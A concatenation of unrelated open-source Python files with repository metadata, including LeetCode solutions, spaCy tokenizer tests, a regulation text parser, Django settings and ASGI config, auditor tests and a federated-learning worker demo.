9cdfe7992090fb91696eec8d0a8ae15ee12efffe
|
/recursion/prob1221.py
|
75de61d8cb82f1561f811ecae781765b333d2848
|
[] |
no_license
|
binchen15/leet-python
|
e62aab19f0c48fd2f20858a6a0d0508706ae21cc
|
e00cf94c5b86c8cca27e3bee69ad21e727b7679b
|
refs/heads/master
| 2022-09-01T06:56:38.471879
| 2022-08-28T05:15:42
| 2022-08-28T05:15:42
| 243,564,799
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
# 1221 Split string into Balanced Strings
class Solution(object):
def balancedStringSplit(self, s):
"""
:type s: str
:rtype: int
"""
m = len(s)
if m == 2:
return 1
i = 2
while i < m:
if self.isBalanced(s[:i]):
# self.balancedStringSplit(s[:i])
return 1 + self.balancedStringSplit(s[i:])
i += 2
return 1
def isBalanced(self, sub):
return sub.count("L") == sub.count('R')
|
[
"binchen.devops@gmail.com"
] |
binchen.devops@gmail.com
|
31b90af5e2d762ee6482a7c0202484d4b2a0cff5
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/spaCy/2016/4/test_only_punct.py
|
12c9580880eb988530171fcf1973e0dc5ca361fa
|
[
"MIT"
] |
permissive
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from __future__ import unicode_literals
def test_only_pre1(en_tokenizer):
assert len(en_tokenizer("(")) == 1
def test_only_pre2(en_tokenizer):
assert len(en_tokenizer("((")) == 2
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
47c3be1644c3b304105e0c662dc9f38ee860d001
|
9ecb6a1d3a71e7f87f3784af6b808f23a2abe348
|
/drlhp/show_prefs.py
|
4227c4f161eda839c7a5c5661322f9b2b12658a5
|
[] |
no_license
|
HumanCompatibleAI/interactive-behaviour-design
|
13ae305b39d29595e8fd5907f8d9e9fa6c2efc16
|
226db7a55d64ce15edfb8d7b3352c7bf7b81b533
|
refs/heads/master
| 2020-05-02T16:54:02.232639
| 2019-08-08T14:29:11
| 2019-08-08T14:29:11
| 178,082,205
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
#!/usr/bin/env python3
"""
Display examples of the specified preference database
(with the less-preferred segment on the left,
and the more-preferred segment on the right)
(skipping over equally-preferred segments)
"""
import argparse
import pickle
from multiprocessing import freeze_support
import numpy as np
from utils import VideoRenderer
def main():
parser = argparse.ArgumentParser()
parser.add_argument("prefs", help=".pkl.gz file")
args = parser.parse_args()
with open(args.prefs, 'rb') as pkl_file:
print("Loading preferences from '{}'...".format(args.prefs), end="")
prefs = pickle.load(pkl_file)
print("done!")
print("{} preferences found".format(len(prefs)))
print("(Preferred clip on the left)")
v = VideoRenderer(zoom=2, mode=VideoRenderer.restart_on_get_mode)
q = v.vid_queue
prefs = prefs[0] # The actual pickle file is a tuple of test, train DBs
for k1, k2, pref in prefs.prefs:
pref = tuple(pref)
if pref == (0.0, 1.0) or pref == (0.5, 0.5):
s1 = np.array(prefs.segments[k2])
s2 = np.array(prefs.segments[k1])
elif pref == (1.0, 0.0):
s1 = np.array(prefs.segments[k1])
s2 = np.array(prefs.segments[k2])
else:
raise Exception("Unexpected preference", pref)
print("Preference", pref)
vid = []
height = s1[0].shape[0]
border = np.ones((height, 10), dtype=np.uint8) * 128
for t in range(len(s1)):
# -1 => select the last frame in the 4-frame stack
f1 = s1[t, :, :, -1]
f2 = s2[t, :, :, -1]
frame = np.hstack((f1, border, f2))
vid.append(frame)
n_pause_frames = 10
for _ in range(n_pause_frames):
vid.append(np.copy(vid[-1]))
q.put(vid)
input()
v.stop()
if __name__ == '__main__':
freeze_support()
main()
|
[
"matthew.rahtz@gmail.com"
] |
matthew.rahtz@gmail.com
|
b5644533f4814bf76a438d3f873511d94ae32cb7
|
ffedbe2d957677d65cb873d96482f1c94e74b988
|
/regs/depth/paragraph.py
|
4c7ad12fb53030d7ebe97823604eec9398cee496
|
[] |
no_license
|
cmc333333/Depth-Parser
|
b7602c158b6cb75179af90b78af93f28e547a3d2
|
4332b8c51e8e7d44b68985b3845b300d251af536
|
refs/heads/master
| 2020-05-20T12:09:03.662019
| 2013-04-16T20:37:56
| 2013-04-16T20:37:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
import itertools
import re
from regs.depth import tree
from regs.search import segments
from regs.utils import roman_nums
import string
p_levels = [
list(string.ascii_lowercase),
[str(i) for i in range(1,51)],
list(itertools.islice(roman_nums(), 0, 50)),
list(string.ascii_uppercase),
# Technically, there's italics (alpha) and (roman), but we aren't
# handling that yet
]
class ParagraphParser():
def __init__(self, p_regex, inner_label_fn):
"""p_regex is the regular expression used when searching through
paragraphs. It should contain a %s for the next paragraph 'part'
(e.g. 'a', 'A', '1', 'i', etc.) inner_label_fn is a function which
takes the current label, and the next paragraph 'part' and produces
a new label."""
self.p_regex = p_regex
self.inner_label_fn = inner_label_fn
def matching_subparagraph_ids(self, p_level, paragraph):
"""Return a list of matches if this paragraph id matches one of the
subparagraph ids (e.g. letter (i) and roman numeral (i)."""
matches = []
for depth in range(p_level+1, len(p_levels)):
for sub_id, sub in enumerate(p_levels[depth]):
if sub == p_levels[p_level][paragraph]:
matches.append((depth, sub_id))
return matches
def best_start(self, text, p_level, paragraph, starts, exclude = []):
"""Given a list of potential paragraph starts, pick the best based
on knowledge of subparagraph structure. Do this by checking if the
id following the subparagraph (e.g. ii) is between the first match
and the second. If so, skip it, as that implies the first match was
a subparagraph."""
subparagraph_hazards = self.matching_subparagraph_ids(p_level,
paragraph)
starts = starts + [(len(text), len(text))]
for i in range(1, len(starts)):
_, prev_end = starts[i-1]
next_start, _ = starts[i]
s_text = text[prev_end:next_start]
s_exclude = [(e_start + prev_end, e_end + prev_end)
for e_start, e_end in exclude]
is_subparagraph = False
for hazard_level, hazard_idx in subparagraph_hazards:
if self.find_paragraph_start_match(s_text, hazard_level,
hazard_idx + 1, s_exclude):
is_subparagraph = True
if not is_subparagraph:
return starts[i-1]
def find_paragraph_start_match(self, text, p_level, paragraph, exclude=[]):
"""Find the positions for the start and end of the requested label.
p_Level is one of 0,1,2,3; paragraph is the index within that label.
Return None if not present. Does not return results in the exclude
list (a list of start/stop indices). """
if len(p_levels) <= p_level or len(p_levels[p_level]) <= paragraph:
return None
match_starts = [(m.start(), m.end()) for m in re.finditer(
self.p_regex % p_levels[p_level][paragraph], text)]
match_starts = [(start, end) for start,end in match_starts
if all([end < es or start > ee for es, ee in exclude])]
if len(match_starts) == 0:
return None
elif len(match_starts) == 1:
return match_starts[0]
else:
return self.best_start(text, p_level, paragraph, match_starts,
exclude)
def paragraph_offsets(self, text, p_level, paragraph, exclude = []):
"""Find the start/end of the requested paragraph. Assumes the text
does not just up a p_level -- see build_paragraph_tree below."""
start = self.find_paragraph_start_match(text, p_level, paragraph,
exclude)
if start == None:
return None
id_start, id_end = start
end = self.find_paragraph_start_match(text[id_end:], p_level,
paragraph + 1, [(e_start - id_end, e_end - id_end)
for e_start, e_end in exclude])
if end == None:
end = len(text)
else:
end = end[0] + id_end
return (id_start, end)
def paragraphs(self, text, p_level, exclude = []):
"""Return a list of paragraph offsets defined by the level param."""
def offsets_fn(remaining_text, p_idx, exclude):
return self.paragraph_offsets(remaining_text, p_level, p_idx,
exclude)
return segments(text, offsets_fn, exclude)
def build_paragraph_tree(self, text, p_level = 0, exclude = [],
label = tree.label("", [])):
"""
Build a dict to represent the text hierarchy.
"""
subparagraphs = self.paragraphs(text, p_level, exclude)
if subparagraphs:
body_text = text[0:subparagraphs[0][0]]
else:
body_text = text
children = []
for paragraph, (start,end) in enumerate(subparagraphs):
new_text = text[start:end]
new_excludes = [(e[0] - start, e[1] - start) for e in exclude]
new_label = self.inner_label_fn(label,
p_levels[p_level][paragraph])
children.append(self.build_paragraph_tree(new_text, p_level + 1,
new_excludes, new_label))
return tree.node(body_text, children, label)
|
[
"cm.lubinski@gmail.com"
] |
cm.lubinski@gmail.com
|
4af2ccbccc3801bfd03ba5d348228bde9e7d5e13
|
fd133e8252dc4ddb8221007f806da336639e9029
|
/924_minimize_malware_speed.py
|
9ebceeb1693f0f22ca3036256554fcb1d0d201ee
|
[] |
no_license
|
nikrasiya/Graph-2
|
ea331e8470a73eef2f70cbb71f28023f704f1ba2
|
4689f2e0d1a0847ab519715d7659939dad89e001
|
refs/heads/master
| 2021-05-17T16:21:17.539763
| 2020-04-06T13:18:31
| 2020-04-06T13:18:31
| 250,869,007
| 0
| 0
| null | 2020-03-28T18:44:58
| 2020-03-28T18:44:58
| null |
UTF-8
|
Python
| false
| false
| 4,082
|
py
|
from typing import List
from collections import defaultdict, Counter
class Solution:
def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
"""
https://leetcode.com/problems/minimize-malware-spread/
Time Complexity - O(V*E)
'V' -> vertices
'E' -> edges
Space Complexity - O(V)
"""
self.n = len(graph)
self.colors = [-1] * self.n
c = 0
for i in range(self.n):
self._dfs(i, c, graph)
c += 1
groups = Counter(self.colors)
init_color = [0] * c
for node in initial:
init_color[self.colors[node]] += 1
result = float('inf')
for node in initial:
color = self.colors[node]
count = init_color[color]
if count == 1:
if result == float('inf'):
result = node
elif groups[color] > groups[self.colors[result]]:
result = node
elif groups[color] == groups[self.colors[result]] and node < result:
result = node
if result == float('inf'):
return min(initial)
return result
def _dfs(self, node, color, graph):
# base
if self.colors[node] != -1:
return
# logic
self.colors[node] = color
for i in range(self.n):
if graph[node][i] == 1:
self._dfs(i, color, graph)
# def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
# """
# https://leetcode.com/problems/minimize-malware-spread/
# Time Complexity -
# Space Complexity -
# """
# adj_matrix = defaultdict(list)
# initial = sorted(initial)
# # graph
# for node in range(len(graph)):
# for edge in range(len(graph[0])):
# if graph[node][edge] == 1:
# adj_matrix[node].append(edge)
# # make groups
# groups = {}
# counts = {}
# g_name = 0
# min_group_name = None
# max_group_size = float('-inf')
# visited = set()
# for node in initial:
# group, infected_count = self._dfs(initial, visited, adj_matrix, node)
# if group:
# groups[g_name] = group
# counts[g_name] = infected_count
# if infected_count == 1 and len(group) > max_group_size:
# max_group_size = len(group)
# min_group_name = g_name
# g_name += 1
# if min_group_name is None:
# return min(initial)
# return min(set(initial).intersection(groups[min_group_name]))
#
# def _dfs(self, initial, visited, adj_matrix, root):
# if root in visited:
# return None, None
# stack = [root]
# result = []
# initial_count = 0
# while stack:
# cur = stack.pop()
# if cur in initial:
# initial_count += 1
# for edge in adj_matrix[cur]:
# if edge != cur and edge not in visited:
# stack.append(edge)
# if cur not in visited:
# visited.add(cur)
# result.append(cur)
# return result, initial_count
if __name__ == '__main__':
print(Solution().minMalwareSpread([[1, 1, 1], [1, 1, 1], [1, 1, 1]], [1, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1]))
print(Solution().minMalwareSpread([[1, 0, 0], [0, 1, 0], [0, 0, 1]], [0, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1, 2]))
print(Solution().minMalwareSpread([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]], [3, 1]))
print(Solution().minMalwareSpread(
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0], [0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 1]], [5, 0]))
|
[
"you@example.com"
] |
you@example.com
|
77ebbe0d48ff860ba8eab641e85ade6503ca77d9
|
f2ab8ccda7203dd37d61facb9978cf74b781c7f1
|
/tests/models.py
|
2a33a19a5a6c499db6c4c5ca9168a18891a56d61
|
[
"MIT"
] |
permissive
|
Apkawa/easy-thumbnails-admin
|
1991137224dcd117520b2c114d4012daf803776e
|
9d7a38f215cdac53a663b00f1d4ff3a3c2a54eb4
|
refs/heads/master
| 2021-01-01T15:47:34.334792
| 2017-11-23T10:38:09
| 2017-11-23T10:38:09
| 97,703,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
def upload_to(instance, filename):
return 'example/{}'.format(filename)
class Example(models.Model):
image = ThumbnailerImageField(upload_to=upload_to)
|
[
"apkawa@gmail.com"
] |
apkawa@gmail.com
|
139ecc75596912c669b4ed0216a1514922c50a4c
|
605611de5eae63ce4eef388a287a3ef18b52eae7
|
/CovidCrowd/settings.py
|
95d5f1e4b28e5afba1ede23609cd8a48a22b35cd
|
[] |
no_license
|
RahulAttarde/CovidCrowd
|
e6b2e45c222f03112c157403c2d6630d888599d8
|
55740e1ea72cd434aed0a627f6fffb16024a6f17
|
refs/heads/master
| 2021-04-23T00:02:46.726288
| 2020-03-25T02:45:35
| 2020-03-25T02:45:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,879
|
py
|
"""
Django settings for CovidCrowd project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config("DEBUG")
ALLOWED_HOSTS = config("MY_HOSTS", cast=Csv())
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.gis",
"social_django",
"crispy_forms",
"patients",
"rest_framework",
"django_filters",
"django_tables2",
"debug_toolbar",
"memcache_status",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"social_django.middleware.SocialAuthExceptionMiddleware",
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = "CovidCrowd.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"social_django.context_processors.backends",
"social_django.context_processors.login_redirect",
],
},
},
]
WSGI_APPLICATION = "CovidCrowd.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.contrib.gis.db.backends.spatialite",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
AUTHENTICATION_BACKENDS = (
"social_core.backends.github.GithubOAuth2",
"social_core.backends.twitter.TwitterOAuth",
"social_core.backends.google.GoogleOAuth2",
"django.contrib.auth.backends.ModelBackend",
)
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "Asia/Kolkata"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Crispy forms
CRISPY_TEMPLATE_PACK = "bootstrap4"
# OAUTH for Social Login
LOGIN_URL = "/login-form"
SOCIAL_AUTH_URL_NAMESPACE = "social"
SOCIAL_AUTH_LOGIN_REDIRECT_URL = "/"
SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY")
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET")
SOCIAL_AUTH_TWITTER_KEY = config("SOCIAL_AUTH_TWITTER_KEY")
SOCIAL_AUTH_TWITTER_SECRET = config("SOCIAL_AUTH_TWITTER_SECRET")
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config("SOCIAL_AUTH_GOOGLE_OAUTH2_KEY")
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config("SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET")
# Django REST Framework
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
INTERNAL_IPS = [
'127.0.0.1',
]
|
[
"arun@arunmozhi.in"
] |
arun@arunmozhi.in
|
e1752708a0af5efe19acf9209a0dd0734303fa0d
|
840b98f14f181f7dbd693f2ee4b3c46e5be59305
|
/demos/demo_pycloudmessenger/POM2/NeuralNetworks/pom2_NN_worker_pycloudmessenger.py
|
672126432edb472a87502a57beff578247d9307a
|
[
"Apache-2.0"
] |
permissive
|
Musketeer-H2020/MMLL-Robust
|
4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b
|
ccc0a7674a04ae0d00bedc38893b33184c5f68c6
|
refs/heads/main
| 2023-09-01T18:47:46.065297
| 2021-09-28T15:34:12
| 2021-09-28T15:34:12
| 386,264,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,614
|
py
|
# -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom2_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime
# Add higher directory to python modules path.
sys.path.append("../../../../")
# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms
# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--user', type=str, default=None, help='User')
parser.add_argument('--password', type=str, default=None, help='Password')
parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The data partition of the worker')
FLAGS, unparsed = parser.parse_known_args()
user_name = FLAGS.user
user_password = FLAGS.password
task_name = FLAGS.task_name
data_partition_id = FLAGS.id # This integer identifies the data partition used for the worker
# Set basic configuration
dataset_name = 'mnist'
verbose = False
pom = 2
model_type = 'NN'
# Create the directories for storing relevant outputs if they do not exist
create_folders("./results/")
# Setting up the logger
logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')
# Load credentials file to use pycloudmessenger
# Note: this part creates the task and waits for the workers to join. This code is intended to be used only at the demos, in Musketeer this part must be done in the client.
display('===========================================', logger, verbose)
credentials_filename = '../../musketeer.json'
try:
with open(credentials_filename, 'r') as f:
credentials = json.load(f)
except:
display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
sys.exit()
# Create user and join the task
tm = Task_Manager(credentials_filename)
participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)
# Creating the comms object
display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
comms = Comms(participant, user_name)
# Creating Workernode
wn = WorkerNode(pom, comms, logger, verbose)
display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)
# Load data
# Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
# connectors must be provided
data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
try:
dc = DC(data_file)
except:
display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
sys.exit()
# Get train/test data and set training data
[Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
wn.set_training_data(dataset_name, Xtr, ytr)
display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)
# Creating a ML model and start training procedure
wn.create_model_worker(model_type)
display('MMLL model %s is ready for training!' %model_type, logger, verbose)
display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
wn.run()
display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)
# Retrieving and saving the trained model
display('Retrieving the trained model from WorkerNode', logger, verbose)
model = wn.get_model()
# Warning: this save_model utility is only for demo purposes
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
model.save(output_filename_model)
# Making predictions on test data
display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
preprocessors = wn.get_preprocessors()
if preprocessors is not None:
for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
Xtst = prep_model.transform(Xtst)
display('Test data transformed using %s' %prep_model.name, logger, verbose)
preds_tst = model.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Labels
y = np.argmax(ytst, axis=-1) # Convert to labels
classes = np.arange(ytst.shape[1]) # 0 to 9
# Evaluating the results
display('------------- Evaluating --------------------------------------------\n', logger, verbose)
# Warning, these evaluation methods are not part of the MMLL library, they are only intended to be used for the demos. Use them at your own risk.
output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
title = 'NN confusion matrix in test set worker'
plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)
# Load Tf SavedModel and check results
model_loaded = tf.keras.models.load_model(output_filename_model)
preds_tst = model_loaded.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
# Model export to ONXX
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
model.save(output_filename_model)
# Compute the prediction with ONNX Runtime
onnx_session = onnxruntime.InferenceSession(output_filename_model)
onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
onnx_output = onnx_session.run(None, onnx_inputs)[0]
onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
err_onnx = np.mean((preds_tst.ravel() - onnx_output.ravel())**2)
display('Error in ONNX predictions is %f' %err_onnx, logger, verbose)
|
[
"rober.diaz@gmail.com"
] |
rober.diaz@gmail.com
|
f327656c3c6c957763b8883c4183d103b33e956c
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_linking.py
|
619af3537e5435c213053702bea9f7364b783fca
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 228
|
py
|
from xai.brain.wordbase.verbs._link import _LINK
#calss header
class _LINKING(_LINK, ):
def __init__(self,):
_LINK.__init__(self)
self.name = "LINKING"
self.specie = 'verbs'
self.basic = "link"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
e2e0a5e05ade4bf1b990a627802943af3a19626d
|
f5c7d50973d47abd555502470b300b3c70af9fa5
|
/voting/asgi.py
|
856ae28db6db7b31736db9f3585a818ef2de5cc0
|
[
"MIT"
] |
permissive
|
jess-monter/voting_back
|
62b67fafcfa8a9b7feebbca463c5055efdff7d98
|
de54218f01095f5090d490cabf32a86b1e608925
|
refs/heads/main
| 2023-04-06T16:00:45.066076
| 2021-04-14T07:51:10
| 2021-04-14T07:51:10
| 336,810,613
| 0
| 0
|
MIT
| 2021-04-14T07:51:11
| 2021-02-07T14:46:05
|
Python
|
UTF-8
|
Python
| false
| false
| 756
|
py
|
"""
ASGI config for voting project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "voting.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import voting.apps.notifications.routing
application = ProtocolTypeRouter(
{
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(voting.apps.notifications.routing.websocket_urlpatterns)
),
}
)
|
[
"="
] |
=
|
78430575c8a6091691a2baff513bfbe12212aa04
|
e8805bf7c79da1b63d36c3535b8f5ba7d97b6b56
|
/tests/test_auditor/test_auditor_bookmark.py
|
05eaeea64b067419856d25819c257ca50d667dd1
|
[
"MIT"
] |
permissive
|
wbuchwalter/polyaxon
|
9ad681e37065e8aa05741fb7d63b170e4c1fdfe6
|
a01396ea86a74082c457bfbc2c91d283b6ff6fba
|
refs/heads/master
| 2020-03-23T08:34:42.248328
| 2018-07-17T18:29:06
| 2018-07-17T18:29:06
| 141,334,939
| 0
| 0
|
MIT
| 2018-07-17T19:35:22
| 2018-07-17T19:35:21
| null |
UTF-8
|
Python
| false
| false
| 2,819
|
py
|
# pylint:disable=ungrouped-imports
from unittest.mock import patch
import pytest
import activitylogs
import auditor
import tracker
from event_manager.events import bookmark as bookmarks_events
from tests.utils import BaseTest
@pytest.mark.auditor_mark
class AuditorBookmarksTest(BaseTest):
"""Testing subscribed events"""
DISABLE_RUNNER = False
def setUp(self):
auditor.validate()
auditor.setup()
tracker.validate()
tracker.setup()
activitylogs.validate()
activitylogs.setup()
super().setUp()
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_build_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_BUILD_JOBS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_job_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_JOBS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENTS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_group_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENT_GROUPS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_project_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_PROJECTS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
|
[
"mouradmourafiq@gmail.com"
] |
mouradmourafiq@gmail.com
|
c7d144b8335a423d324ebdc6e7a74ee5f11d99ad
|
665455c521cc7cf76c5436337ed545de90976af4
|
/cohesity_management_sdk/models/node_port.py
|
0160cdc36722ac0df6ecf9ed7e2a96895d226b7a
|
[
"Apache-2.0"
] |
permissive
|
hsantoyo2/management-sdk-python
|
d226273bc8eedcf9220ea4999a6f0b9a1a30d99c
|
0093194d125fc6746f55b8499da1270c64f473fc
|
refs/heads/master
| 2023-03-01T06:09:39.644085
| 2021-01-15T08:23:16
